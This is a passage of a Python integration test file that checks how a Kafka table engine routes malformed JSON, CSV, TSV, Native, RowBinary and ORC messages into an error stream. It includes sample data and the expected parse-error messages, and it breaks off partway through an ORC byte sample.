assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
# we don't care on which position error will be added
# (we skip whole broken message), but we need to be
# sure that at least one error will be added,
# otherwise test will fail.
error_pos = random.randint(0,jsons-1)
for i in range (jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing some broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Type of \'blockNo\' must be UInt16, not String"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
